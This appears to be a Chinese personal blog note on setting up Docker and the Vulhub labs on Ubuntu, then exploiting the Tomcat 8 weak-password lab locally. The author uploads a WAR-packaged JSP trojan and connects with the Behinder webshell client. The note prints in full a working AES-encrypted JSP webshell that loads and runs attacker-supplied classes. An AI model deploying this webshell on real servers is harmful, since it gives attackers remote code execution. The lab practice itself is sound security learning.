Ubuntu安装docker
先查看版本
uname -a
直接安装是不行的,一般使用ubuntu系统安装需要先更新
直接安装一般会爆这个错误 ↓
sudo apt-get update
sudo apt-get upgrade
这个安装博文
写的还挺细,不过我是按照官网步骤的
在网上看了一堆,还是官网的安装步骤最靠谱
https://docs.docker.com/engine/install/ubuntu/#prerequisites
安装docker-compose
sudo apt install docker-compose
下载vunlhub
参考 博文
官网 https://vulhub.org/#/docs/run/
git clone https://github.com/vulhub/vulhub.git
构建靶场
报错了
解决办法(可能需要重启客户端
成功
关闭容器
docker-compose down
漏洞环境测试–tomcat8弱口令
说是 上传war包即可直接getshell。
先将木马文件muma.jsp ↓ 压缩成muma.zip,再修改后缀为war,然后再进行上传,上传后如下所示
这文件是网上看到的,也不知道有没有毛病,后悔了
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
上传成功
http://localhost:8080/muma/muma.jsp
使用冰蝎连接 安装冰蝎
冰蝎启动不起来,说是需要jdk6 or 8
我的电脑目前装的有1.8和11,切换失败
网友的方法有删除java11和java8的exe↓文件,
手动修改这个JAVA_HOME
没有成功,后来我发现是修改一下这里的优先级就好了。把jdk8上移到最前面
成功
冰蝎还是运行不起来
在命令行运行jar就可以了
吐槽一下,我对Ubuntu提示信息的误解
连接成功
哈哈哈哈 ~